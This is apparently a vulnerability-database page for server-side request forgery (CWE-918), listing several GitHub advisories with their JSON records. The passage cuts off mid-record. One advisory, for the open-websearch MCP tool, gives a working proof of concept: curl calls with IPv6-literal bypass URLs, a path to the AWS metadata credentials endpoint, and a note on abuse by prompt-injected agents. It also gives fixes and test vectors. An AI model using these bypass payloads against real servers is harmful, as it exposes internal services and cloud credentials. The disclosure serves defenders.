CWE-918
AllowedServer-Side Request Forgery (SSRF)
Abstraction: Base · Status: Incomplete
The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
4636 vulnerabilities reference this CWE, most recent first.
GHSA-RXCQ-Q6Q7-HM9R
Vulnerability from github – Published: 2026-02-05 00:31 – Updated: 2026-02-05 00:31A weakness has been identified in ZenTao up to 21.7.6-85642. The impacted element is the function fetchHook of the file module/webhook/model.php of the component Webhook Module. This manipulation causes server-side request forgery. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
{
"affected": [],
"aliases": [
"CVE-2026-1884"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-04T22:15:57Z",
"severity": "MODERATE"
},
"details": "A weakness has been identified in ZenTao up to 21.7.6-85642. The impacted element is the function fetchHook of the file module/webhook/model.php of the component Webhook Module. This manipulation causes server-side request forgery. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.",
"id": "GHSA-rxcq-q6q7-hm9r",
"modified": "2026-02-05T00:31:00Z",
"published": "2026-02-05T00:31:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1884"
},
{
"type": "WEB",
"url": "https://github.com/ez-lbz/ez-lbz.github.io/issues/9"
},
{
"type": "WEB",
"url": "https://github.com/ez-lbz/ez-lbz.github.io/issues/9#issue-3832844574"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.344264"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.344264"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.742633"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-RXJG-Q5C5-6Q8F
Vulnerability from github – Published: 2022-04-27 00:00 – Updated: 2022-05-06 00:01Monstaftp v2.10.3 was discovered to allow attackers to execute Server-Side Request Forgery (SSRF).
{
"affected": [],
"aliases": [
"CVE-2022-27469"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-04-26T14:15:00Z",
"severity": "CRITICAL"
},
"details": "Monstaftp v2.10.3 was discovered to allow attackers to execute Server-Side Request Forgery (SSRF).",
"id": "GHSA-rxjg-q5c5-6q8f",
"modified": "2022-05-06T00:01:10Z",
"published": "2022-04-27T00:00:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27469"
},
{
"type": "WEB",
"url": "https://www.monstaftp.com"
},
{
"type": "WEB",
"url": "https://www.youtube.com/playlist?list=PLGCNgyyYX0yG9rF3Pd72H7qE9sfRA7d_i"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-V228-72C7-FX8J
Vulnerability from github – Published: 2026-05-05 20:51 – Updated: 2026-05-13 16:24Summary
src/utils/urlSafety.ts exposes isPublicHttpUrl / assertPublicHttpUrl, used to gate the MCP fetchWebContent tool against private-network targets. The check has two defects that together allow non-blind SSRF with the response body returned to the caller:
- Bracketed IPv6 literals are never recognized. Node's WHATWG
URL.hostnamekeeps the surrounding[…]for IPv6 literals.isIP("[::1]")returns 0 (not 6), so neitherisPrivateIpv4norisPrivateIpv6is ever called on an IPv6 literal input — including[::1]itself, and including every IPv4-mapped form such as[::ffff:7f00:1](= 127.0.0.1 via the IPv4 stack). - No DNS resolution.
isPrivateOrLocalHostnameonly inspects the literalhostnamestring. It never resolves the host to an IP. Any attacker-controlled hostname whose DNS record points at 127.0.0.1 (or any RFC1918 / link-local address) passes the check unchanged, andaxiosthen performs its own resolution and connects to the private address.
The isPrivateIpv6 implementation also has the hex bypass (it would miss ::ffff:7f00:1 even if reached) but defect (1) makes every bracketed IPv6 literal slip past before that branch is even entered.
The fetchWebContent tool returns the response body (JSON.stringify(result)) to the MCP caller, so the SSRF is non-blind.
Details
Vulnerable function — src/utils/urlSafety.ts:95-119:
export function isPrivateOrLocalHostname(hostname: string): boolean {
const host = hostname.trim().toLowerCase();
if (!host) return true;
if (host === 'localhost' || host.endsWith('.localhost')) return true;
if (host === 'metadata.google.internal' || host === 'metadata.azure.internal') return true;
const integerIp = parseIntegerIpv4Literal(host);
if (integerIp && isPrivateIpv4(integerIp)) return true;
if (isPrivateOrLocalIp(host)) return true; // only runs if isIP(host) ∈ {4, 6}
return false;
}
isPrivateOrLocalIp — src/utils/urlSafety.ts:84-93:
function isPrivateOrLocalIp(ip: string): boolean {
const version = isIP(ip); // returns 0 for "[::1]", "[::ffff:7f00:1]", any bracketed literal
if (version === 4) return isPrivateIpv4(ip);
if (version === 6) return isPrivateIpv6(ip);
return false;
}
Caller — src/tools/setupTools.ts:252-286 (fetchWebContent tool):
server.tool(
fetchWebToolName, // default: "fetchWebContent"
"Fetch content from a public HTTP(S) URL ...",
{ url: z.string().url().refine(
(url) => validatePublicWebUrl(url), // → isPublicHttpUrl → isPrivateOrLocalHostname
"URL must be a public HTTP(S) address ..."
), /* … */ },
async ({url, maxChars}) => {
const result = await runtime.services.fetchWeb.execute({ url, maxChars, /*…*/ });
return { content: [{ type: 'text', text: JSON.stringify(result, null, 2) }] };
}
);
Service — src/engines/web/fetchWebContent.ts:313-375: re-validates via assertPublicHttpUrl (same broken check), then calls axios.head + axios.get on the raw URL and returns response.data and response.headers to the caller.
Transport — src/index.ts:85-253: when config.enableHttpServer is true (documented configuration; enabled by the Docker image), the MCP server binds on 0.0.0.0:${PORT} (default 3000) with CORS origin: '*' and no authentication on /mcp (Streamable HTTP) or /sse (legacy SSE). Anyone who can reach the port can invoke any tool.
Verification of the validator (run against current HEAD)
I executed the real isPublicHttpUrl / assertPublicHttpUrl from src/utils/urlSafety.ts under tsx against a set of inputs:
| Input URL | parsed.hostname | isPublicHttpUrl | assertPublicHttpUrl |
|---|---|---|---|
| http://[::ffff:7f00:1]/ (127.0.0.1) | [::ffff:7f00:1] | true ← bypass | PASSED ← bypass |
| http://[::ffff:a9fe:1]/ (169.254.0.1) | [::ffff:a9fe:1] | true ← bypass | PASSED ← bypass |
| http://[::ffff:a00:1]/ (10.0.0.1) | [::ffff:a00:1] | true ← bypass | PASSED ← bypass |
| http://[::ffff:127.0.0.1]/ | [::ffff:7f00:1] | true ← bypass | PASSED ← bypass |
| http://[0:0:0:0:0:0:0:1]/ | [::1] | true ← bypass | PASSED ← bypass |
| http://[::1]/ (plain loopback!) | [::1] | true ← bypass | PASSED ← bypass |
| http://127.0.0.1/ (control) | 127.0.0.1 | false (blocked) | threw (blocked) |
| http://localhost/ (control) | localhost | false (blocked) | threw (blocked) |
WHATWG new URL("http://[::ffff:127.0.0.1]/").hostname returns [::ffff:7f00:1] — note that Node's URL parser actively re-encodes the dotted form to hex, helping the bypass. Every bracketed IPv6 literal passes the validator.
Verification of the fetch (Node 22/25)
I bound a trivial HTTP server to 127.0.0.1:29999 and called axios.get("http://[::ffff:7f00:1]:29999/") from Node; the request reached the server:
HIT: / from 127.0.0.1 family IPv4
http://[::ffff:7f00:1]:29999/ -> 200 <html>internal content</html>
The OS routes ::ffff:X.X.X.X connections through the IPv4 stack, so the PoC works identically across macOS and Linux.
Environment: clean clone of Aas-ee/open-webSearch@HEAD, Node 22+.
1. Start the MCP HTTP server.
git clone https://github.com/Aas-ee/open-webSearch.git
cd open-webSearch
npm install && npm run build
MODE=http PORT=3000 node build/index.js &
2. Stand up a canary on loopback.
node -e '
require("http").createServer((q,r)=>{
console.log("[canary]", q.method, q.url, "from", q.socket.remoteAddress);
r.writeHead(200, {"content-type":"text/html"});
r.end("INTERNAL-SECRET: canary-hit for " + q.url);
}).listen(19999, "127.0.0.1", () => console.log("canary on 127.0.0.1:19999"));
' &
3. Open an MCP session and call fetchWebContent with the bypass URL.
# Accept header must include both JSON and SSE for Streamable HTTP transport.
ACCEPT='application/json, text/event-stream'
# initialize → grab the mcp-session-id header
SID=$(curl -sSD - -o /dev/null -X POST http://127.0.0.1:3000/mcp \
-H "Accept: $ACCEPT" -H 'Content-Type: application/json' \
-d '{"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2025-03-26","capabilities":{},"clientInfo":{"name":"poc","version":"0"}}}' \
| awk 'tolower($1)=="mcp-session-id:" { gsub(/\r/,""); print $2 }')
# notifications/initialized
curl -sS -X POST http://127.0.0.1:3000/mcp \
-H "Accept: $ACCEPT" -H 'Content-Type: application/json' -H "mcp-session-id: $SID" \
-d '{"jsonrpc":"2.0","method":"notifications/initialized","params":{}}' >/dev/null
# call fetchWebContent with the SSRF bypass URL
curl -sS -X POST http://127.0.0.1:3000/mcp \
-H "Accept: $ACCEPT" -H 'Content-Type: application/json' -H "mcp-session-id: $SID" \
-d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{
"name":"fetchWebContent",
"arguments":{"url":"http://[::ffff:7f00:1]:19999/internal","maxChars":10000}
}}'
Expected result: the canary logs [canary] GET /internal from 127.0.0.1, and the MCP response contains INTERNAL-SECRET: canary-hit for /internal in the tool's content[0].text.
Additional bypass vectors that work the same way:
http://[::1]:<port>/— plain IPv6 loopback.http://[::ffff:a9fe:1]/latest/meta-data/iam/security-credentials/— AWS EC2 metadata over the IPv4 stack.http://attacker.example/whereattacker.examplehas A/AAAA pointing at any private address — bypasses via defect (2), no IPv6 trick needed.
Impact
- Cross-tenant SSRF with full response body. Any client that can speak MCP to the HTTP transport can fetch arbitrary private-network URLs and receive the response body. AWS EC2 metadata, internal dashboards, loopback services, RFC1918 neighbours — all in scope.
- Pre-auth when
enableHttpServeris set. No authentication layer exists on/mcpor/sse; CORS is*. - DNS-rebinding / LAN-victim angle. Because
/mcpis CORS*and acceptsPOST, a victim who visits an attacker-controlled webpage while running open-webSearch locally will have their browser used to send tool-call requests, and the tool's response can be exfiltrated back via a simple XHR. - Exploitable over stdio too. Even with HTTP disabled, a compromised or prompt-injected MCP client can call
fetchWebContentagainst loopback on the host running the server — a realistic LLM-agent-abuse vector.
No meaningful mitigation in the call chain: only http:// and https:// schemes are accepted, but that is not a restriction for SSRF.
Suggested fix
Two changes, either of which individually closes most of the gap; both together close it fully.
-
Normalize the hostname before IP checks, and perform a DNS resolution. Use the
ip-addresspackage or a similar canonicalizer, and reject anygetaddrinforesult whose IP falls in a private CIDR. Keep a bracket-stripping step for IPv6 literals before callingisIP().```ts import { lookup } from 'node:dns/promises'; import { Address4, Address6 } from 'ip-address';
function stripBrackets(h: string): string { return h.startsWith('[') && h.endsWith(']') ? h.slice(1, -1) : h; }
const BLOCKED_V6_CIDRS = [ '::1/128', '::/128', 'fc00::/7', 'fe80::/10', '2001:db8::/32', '2002::/16', '64:ff9b::/96', '100::/64', 'ff00::/8', '::ffff:0:0/96', // IPv4-mapped — delegate to v4 check ];
function ipv6IsPrivate(addr6: Address6): boolean { const v4 = addr6.to4(); if (v4 && v4.isValid()) return isPrivateIpv4(v4.address); return BLOCKED_V6_CIDRS.some(cidr => addr6.isInSubnet(new Address6(cidr))); }
export async function assertPublicHttpUrl(url: URL | string, label = 'URL') { const parsed = typeof url === 'string' ? new URL(url) : url; if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') throw …; const host = stripBrackets(parsed.hostname);
// Literal IP case. const v = isIP(host); if (v === 4 && isPrivateIpv4(host)) throw …; if (v === 6 && ipv6IsPrivate(new Address6(host))) throw …;
if (v === 0) { // Hostname — resolve and check every record. const records = await lookup(host, { all: true, verbatim: true }); for (const r of records) { if (r.family === 4 && isPrivateIpv4(r.address)) throw …; if (r.family === 6 && ipv6IsPrivate(new Address6(r.address))) throw …; } } } ```
-
Dual-pin the connection. Even a perfect pre-connect check has TOCTOU gaps (DNS rebinding between check and
axios.get). Use a customundiciAgentwhoseconnecthook validates the actual connected socket IP viasocket.remoteAddress. That closes the rebinding window. -
Gate the HTTP transport. Require a bearer token (env var) on
/mcpand/sse, and restrict binding to127.0.0.1by default. CORS*plus no-auth on0.0.0.0is the same exposure profile as an unauthenticated open proxy.
Test vectors to add to the suite:
```ts for (const url of [ 'http://[::1]/', 'http://[::]/', 'http://[::ffff:127.0.0.1]/', 'http://[::ffff:7f00:1]/', 'http://[0:0:0:0:0:ffff:127.0.0.1]/', 'http://[0:0:0:0:0:0:0:1]/', 'http://[::0:1]/', 'http://[0:0::1]/', 'http://[::ffff:a00:1]/', 'http://[::ffff:c0a8:1]/', 'http://[::ffff:a9fe:1]/', ]) expect(isPublicHttpUrl(url)).toBe(false);
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.1.6"
},
"package": {
"ecosystem": "npm",
"name": "open-websearch"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.1.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42260"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-693",
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-05T20:51:45Z",
"nvd_published_at": "2026-05-12T15:16:15Z",
"severity": "HIGH"
},
"details": "### Summary\n`src/utils/urlSafety.ts` exposes `isPublicHttpUrl` / `assertPublicHttpUrl`, used to gate the MCP `fetchWebContent` tool against private-network targets. The check has two defects that together allow **non-blind SSRF with the response body returned to the caller**:\n\n1. **Bracketed IPv6 literals are never recognized.** Node\u0027s WHATWG `URL.hostname` keeps the surrounding `[\u2026]` for IPv6 literals. `isIP(\"[::1]\")` returns 0 (not 6), so neither `isPrivateIpv4` nor `isPrivateIpv6` is ever called on an IPv6 literal input \u2014 including `[::1]` itself, and including every IPv4-mapped form such as `[::ffff:7f00:1]` (= 127.0.0.1 via the IPv4 stack).\n2. **No DNS resolution.** `isPrivateOrLocalHostname` only inspects the literal `hostname` string. It never resolves the host to an IP. Any attacker-controlled hostname whose DNS record points at 127.0.0.1 (or any RFC1918 / link-local address) passes the check unchanged, and `axios` then performs its own resolution and connects to the private address.\n\nThe `isPrivateIpv6` implementation also has the hex bypass (it would miss `::ffff:7f00:1` even if reached) but defect (1) makes every bracketed IPv6 literal slip past before that branch is even entered.\n\nThe `fetchWebContent` tool returns the response body (`JSON.stringify(result)`) to the MCP caller, so the SSRF is non-blind.\n\n### Details\n\u003c!-- obsidian --\u003e\u003cp\u003e\u003cstrong\u003eVulnerable function\u003c/strong\u003e \u2014 \u003ccode\u003esrc/utils/urlSafety.ts:95-119\u003c/code\u003e:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-ts\"\u003eexport function isPrivateOrLocalHostname(hostname: string): boolean {\n const host = hostname.trim().toLowerCase();\n if (!host) return true;\n if (host === \u0027localhost\u0027 || host.endsWith(\u0027.localhost\u0027)) return true;\n if (host === \u0027metadata.google.internal\u0027 || host === \u0027metadata.azure.internal\u0027) return true;\n const integerIp = parseIntegerIpv4Literal(host);\n if (integerIp \u0026#x26;\u0026#x26; isPrivateIpv4(integerIp)) return true;\n if (isPrivateOrLocalIp(host)) return true; // only runs if isIP(host) \u2208 {4, 6}\n return false;\n}\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003e\u003ccode\u003eisPrivateOrLocalIp\u003c/code\u003e \u2014 \u003ccode\u003esrc/utils/urlSafety.ts:84-93\u003c/code\u003e:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-ts\"\u003efunction isPrivateOrLocalIp(ip: string): boolean {\n const version = isIP(ip); // returns 0 for \"[::1]\", \"[::ffff:7f00:1]\", any bracketed literal\n if (version === 4) return isPrivateIpv4(ip);\n if (version === 6) return isPrivateIpv6(ip);\n return false;\n}\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eCaller \u2014 \u003ccode\u003esrc/tools/setupTools.ts:252-286\u003c/code\u003e (\u003ccode\u003efetchWebContent\u003c/code\u003e tool):\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-ts\"\u003eserver.tool(\n fetchWebToolName, // default: \"fetchWebContent\"\n \"Fetch content from a public HTTP(S) URL ...\",\n { url: z.string().url().refine(\n (url) =\u003e validatePublicWebUrl(url), // \u2192 isPublicHttpUrl \u2192 isPrivateOrLocalHostname\n \"URL must be a public HTTP(S) address ...\"\n ), /* \u2026 */ },\n async ({url, maxChars}) =\u003e {\n const result = await runtime.services.fetchWeb.execute({ url, maxChars, /*\u2026*/ });\n return { content: [{ type: \u0027text\u0027, text: JSON.stringify(result, null, 2) }] };\n }\n);\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eService \u2014 \u003ccode\u003esrc/engines/web/fetchWebContent.ts:313-375\u003c/code\u003e: re-validates via \u003ccode\u003eassertPublicHttpUrl\u003c/code\u003e (same broken check), then calls \u003ccode\u003eaxios.head\u003c/code\u003e + \u003ccode\u003eaxios.get\u003c/code\u003e on the raw URL and returns \u003ccode\u003eresponse.data\u003c/code\u003e and \u003ccode\u003eresponse.headers\u003c/code\u003e to the caller.\u003c/p\u003e\n\u003cp\u003eTransport \u2014 \u003ccode\u003esrc/index.ts:85-253\u003c/code\u003e: when \u003ccode\u003econfig.enableHttpServer\u003c/code\u003e is true (documented configuration; enabled by the Docker image), the MCP server binds on \u003ccode\u003e0.0.0.0:${PORT}\u003c/code\u003e (default \u003ccode\u003e3000\u003c/code\u003e) with CORS \u003ccode\u003eorigin: \u0027*\u0027\u003c/code\u003e and \u003cstrong\u003eno authentication\u003c/strong\u003e on \u003ccode\u003e/mcp\u003c/code\u003e (Streamable HTTP) or \u003ccode\u003e/sse\u003c/code\u003e (legacy SSE). Anyone who can reach the port can invoke any tool.\u003c/p\u003e\n\u003ch3 data-heading=\"Verification of the validator (run against current \u0026#x60;HEAD\u0026#x60;)\"\u003eVerification of the validator (run against current \u003ccode\u003eHEAD\u003c/code\u003e)\u003c/h3\u003e\n\u003cp\u003eI executed the real \u003ccode\u003eisPublicHttpUrl\u003c/code\u003e / \u003ccode\u003eassertPublicHttpUrl\u003c/code\u003e from \u003ccode\u003esrc/utils/urlSafety.ts\u003c/code\u003e under \u003ccode\u003etsx\u003c/code\u003e against a set of inputs:\u003c/p\u003e\n\nInput URL | parsed.hostname | isPublicHttpUrl | assertPublicHttpUrl\n-- | -- | -- | --\nhttp://[::ffff:7f00:1]/ (127.0.0.1) | [::ffff:7f00:1] | true \u2190 bypass | PASSED \u2190 bypass\nhttp://[::ffff:a9fe:1]/ (169.254.0.1) | [::ffff:a9fe:1] | true \u2190 bypass | PASSED \u2190 bypass\nhttp://[::ffff:a00:1]/ (10.0.0.1) | [::ffff:a00:1] | true \u2190 bypass | PASSED \u2190 bypass\nhttp://[::ffff:127.0.0.1]/ | [::ffff:7f00:1] | true \u2190 bypass | PASSED \u2190 bypass\nhttp://[0:0:0:0:0:0:0:1]/ | [::1] | true \u2190 bypass | PASSED \u2190 bypass\nhttp://[::1]/ (plain loopback!) | [::1] | true \u2190 bypass | PASSED \u2190 bypass\nhttp://127.0.0.1/ (control) | 127.0.0.1 | false (blocked) | threw (blocked)\nhttp://localhost/ (control) | localhost | false (blocked) | threw (blocked)\n\n\n\u003cp\u003eWHATWG \u003ccode\u003enew URL(\"http://[::ffff:127.0.0.1]/\").hostname\u003c/code\u003e returns \u003ccode\u003e[::ffff:7f00:1]\u003c/code\u003e \u2014 note that Node\u0027s URL parser actively re-encodes the dotted form to hex, helping the bypass. Every bracketed IPv6 literal passes the validator.\u003c/p\u003e\n\u003ch3 data-heading=\"Verification of the fetch (Node 22/25)\"\u003eVerification of the fetch (Node 22/25)\u003c/h3\u003e\n\u003cp\u003eI bound a trivial HTTP server to \u003ccode\u003e127.0.0.1:29999\u003c/code\u003e and called \u003ccode\u003eaxios.get(\"http://[::ffff:7f00:1]:29999/\")\u003c/code\u003e from Node; the request reached the server:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e HIT: / from 127.0.0.1 family IPv4\nhttp://[::ffff:7f00:1]:29999/ -\u003e 200 \u0026#x3C;html\u003einternal content\u0026#x3C;/html\u003e\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eThe OS routes \u003ccode\u003e::ffff:X.X.X.X\u003c/code\u003e connections through the IPv4 stack, so the PoC works identically across macOS and Linux.\u003c/p\u003e\n\nEnvironment: clean clone of `Aas-ee/open-webSearch@HEAD`, Node 22+.\n\n**1. Start the MCP HTTP server.**\n\n```bash\ngit clone https://github.com/Aas-ee/open-webSearch.git\ncd open-webSearch\nnpm install \u0026\u0026 npm run build\nMODE=http PORT=3000 node build/index.js \u0026\n```\n\n**2. Stand up a canary on loopback.**\n\n```bash\nnode -e \u0027\n require(\"http\").createServer((q,r)=\u003e{\n console.log(\"[canary]\", q.method, q.url, \"from\", q.socket.remoteAddress);\n r.writeHead(200, {\"content-type\":\"text/html\"});\n r.end(\"INTERNAL-SECRET: canary-hit for \" + q.url);\n }).listen(19999, \"127.0.0.1\", () =\u003e console.log(\"canary on 127.0.0.1:19999\"));\n\u0027 \u0026\n```\n\n**3. Open an MCP session and call `fetchWebContent` with the bypass URL.**\n\n```bash\n# Accept header must include both JSON and SSE for Streamable HTTP transport.\nACCEPT=\u0027application/json, text/event-stream\u0027\n\n# initialize \u2192 grab the mcp-session-id header\nSID=$(curl -sSD - -o /dev/null -X POST http://127.0.0.1:3000/mcp \\\n -H \"Accept: $ACCEPT\" -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\"jsonrpc\":\"2.0\",\"id\":1,\"method\":\"initialize\",\"params\":{\"protocolVersion\":\"2025-03-26\",\"capabilities\":{},\"clientInfo\":{\"name\":\"poc\",\"version\":\"0\"}}}\u0027 \\\n | awk \u0027tolower($1)==\"mcp-session-id:\" { gsub(/\\r/,\"\"); print $2 }\u0027)\n\n# notifications/initialized\ncurl -sS -X POST http://127.0.0.1:3000/mcp \\\n -H \"Accept: $ACCEPT\" -H \u0027Content-Type: application/json\u0027 -H \"mcp-session-id: $SID\" \\\n -d \u0027{\"jsonrpc\":\"2.0\",\"method\":\"notifications/initialized\",\"params\":{}}\u0027 \u003e/dev/null\n\n# call fetchWebContent with the SSRF bypass URL\ncurl -sS -X POST http://127.0.0.1:3000/mcp \\\n -H \"Accept: $ACCEPT\" -H \u0027Content-Type: application/json\u0027 -H \"mcp-session-id: $SID\" \\\n -d \u0027{\"jsonrpc\":\"2.0\",\"id\":2,\"method\":\"tools/call\",\"params\":{\n \"name\":\"fetchWebContent\",\n \"arguments\":{\"url\":\"http://[::ffff:7f00:1]:19999/internal\",\"maxChars\":10000}\n }}\u0027\n```\n\nExpected result: the canary logs `[canary] GET /internal from 127.0.0.1`, and the MCP response contains `INTERNAL-SECRET: canary-hit for /internal` in the tool\u0027s `content[0].text`.\n\nAdditional bypass vectors that work the same way:\n\n- `http://[::1]:\u003cport\u003e/` \u2014 plain IPv6 loopback.\n- `http://[::ffff:a9fe:1]/latest/meta-data/iam/security-credentials/` \u2014 AWS EC2 metadata over the IPv4 stack.\n- `http://attacker.example/` where `attacker.example` has A/AAAA pointing at any private address \u2014 bypasses via defect (2), no IPv6 trick needed.\n\n### Impact\n\n- **Cross-tenant SSRF with full response body.** Any client that can speak MCP to the HTTP transport can fetch arbitrary private-network URLs and receive the response body. AWS EC2 metadata, internal dashboards, loopback services, RFC1918 neighbours \u2014 all in scope.\n- **Pre-auth when `enableHttpServer` is set.** No authentication layer exists on `/mcp` or `/sse`; CORS is `*`.\n- **DNS-rebinding / LAN-victim angle.** Because `/mcp` is CORS `*` and accepts `POST`, a victim who visits an attacker-controlled webpage while running open-webSearch locally will have their browser used to send tool-call requests, and the tool\u0027s response can be exfiltrated back via a simple XHR.\n- **Exploitable over stdio too.** Even with HTTP disabled, a compromised or prompt-injected MCP client can call `fetchWebContent` against loopback on the host running the server \u2014 a realistic LLM-agent-abuse vector.\n\nNo meaningful mitigation in the call chain: only `http://` and `https://` schemes are accepted, but that is not a restriction for SSRF.\n\n### Suggested fix\n\nTwo changes, either of which individually closes most of the gap; both together close it fully.\n\n1. **Normalize the hostname before IP checks, and perform a DNS resolution.** Use the `ip-address` package or a similar canonicalizer, and reject any `getaddrinfo` result whose IP falls in a private CIDR. Keep a bracket-stripping step for IPv6 literals before calling `isIP()`.\n\n ```ts\n import { lookup } from \u0027node:dns/promises\u0027;\n import { Address4, Address6 } from \u0027ip-address\u0027;\n\n function stripBrackets(h: string): string {\n return h.startsWith(\u0027[\u0027) \u0026\u0026 h.endsWith(\u0027]\u0027) ? h.slice(1, -1) : h;\n }\n\n const BLOCKED_V6_CIDRS = [\n \u0027::1/128\u0027, \u0027::/128\u0027,\n \u0027fc00::/7\u0027, \u0027fe80::/10\u0027,\n \u00272001:db8::/32\u0027, \u00272002::/16\u0027, \u002764:ff9b::/96\u0027,\n \u0027100::/64\u0027, \u0027ff00::/8\u0027,\n \u0027::ffff:0:0/96\u0027, // IPv4-mapped \u2014 delegate to v4 check\n ];\n\n function ipv6IsPrivate(addr6: Address6): boolean {\n const v4 = addr6.to4();\n if (v4 \u0026\u0026 v4.isValid()) return isPrivateIpv4(v4.address);\n return BLOCKED_V6_CIDRS.some(cidr =\u003e addr6.isInSubnet(new Address6(cidr)));\n }\n\n export async function assertPublicHttpUrl(url: URL | string, label = \u0027URL\u0027) {\n const parsed = typeof url === \u0027string\u0027 ? new URL(url) : url;\n if (parsed.protocol !== \u0027http:\u0027 \u0026\u0026 parsed.protocol !== \u0027https:\u0027) throw \u2026;\n const host = stripBrackets(parsed.hostname);\n\n // Literal IP case.\n const v = isIP(host);\n if (v === 4 \u0026\u0026 isPrivateIpv4(host)) throw \u2026;\n if (v === 6 \u0026\u0026 ipv6IsPrivate(new Address6(host))) throw \u2026;\n\n if (v === 0) {\n // Hostname \u2014 resolve and check every record.\n const records = await lookup(host, { all: true, verbatim: true });\n for (const r of records) {\n if (r.family === 4 \u0026\u0026 isPrivateIpv4(r.address)) throw \u2026;\n if (r.family === 6 \u0026\u0026 ipv6IsPrivate(new Address6(r.address))) throw \u2026;\n }\n }\n }\n ```\n\n2. **Dual-pin the connection.** Even a perfect pre-connect check has TOCTOU gaps (DNS rebinding between check and `axios.get`). Use a custom `undici` `Agent` whose `connect` hook validates the actual connected socket IP via `socket.remoteAddress`. That closes the rebinding window.\n\n3. **Gate the HTTP transport.** Require a bearer token (env var) on `/mcp` and `/sse`, and restrict binding to `127.0.0.1` by default. CORS `*` plus no-auth on `0.0.0.0` is the same exposure profile as an unauthenticated open proxy.\n\nTest vectors to add to the suite:\n\n```ts\nfor (const url of [\n \u0027http://[::1]/\u0027, \u0027http://[::]/\u0027,\n \u0027http://[::ffff:127.0.0.1]/\u0027, \u0027http://[::ffff:7f00:1]/\u0027,\n \u0027http://[0:0:0:0:0:ffff:127.0.0.1]/\u0027,\n \u0027http://[0:0:0:0:0:0:0:1]/\u0027, \u0027http://[::0:1]/\u0027, \u0027http://[0:0::1]/\u0027,\n \u0027http://[::ffff:a00:1]/\u0027, \u0027http://[::ffff:c0a8:1]/\u0027, \u0027http://[::ffff:a9fe:1]/\u0027,\n]) expect(isPublicHttpUrl(url)).toBe(false);",
"id": "GHSA-v228-72c7-fx8j",
"modified": "2026-05-13T16:24:33Z",
"published": "2026-05-05T20:51:45Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Aas-ee/open-webSearch/security/advisories/GHSA-v228-72c7-fx8j"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42260"
},
{
"type": "PACKAGE",
"url": "https://github.com/Aas-ee/open-webSearch"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "open-websearch has SSRF in `fetchWebContent` MCP tool: bracketed IPv6 literals and non-resolving hostname check bypass `isPrivateOrLocalHostname`"
}
GHSA-V2C6-3PHC-2R62
Vulnerability from github – Published: 2026-05-07 18:30 – Updated: 2026-05-07 18:30A vulnerability has been found in router-for-me CLIProxyAPI 6.9.29. Affected by this issue is some unknown functionality of the file internal/api/handlers/management/api_tools.go of the component API Interface. The manipulation of the argument url leads to server-side request forgery. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
{
"affected": [],
"aliases": [
"CVE-2026-8081"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-07T18:16:27Z",
"severity": "LOW"
},
"details": "A vulnerability has been found in router-for-me CLIProxyAPI 6.9.29. Affected by this issue is some unknown functionality of the file internal/api/handlers/management/api_tools.go of the component API Interface. The manipulation of the argument url leads to server-side request forgery. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
"id": "GHSA-v2c6-3phc-2r62",
"modified": "2026-05-07T18:30:41Z",
"published": "2026-05-07T18:30:41Z",
"references": [
{
"type": "ADVISORY",
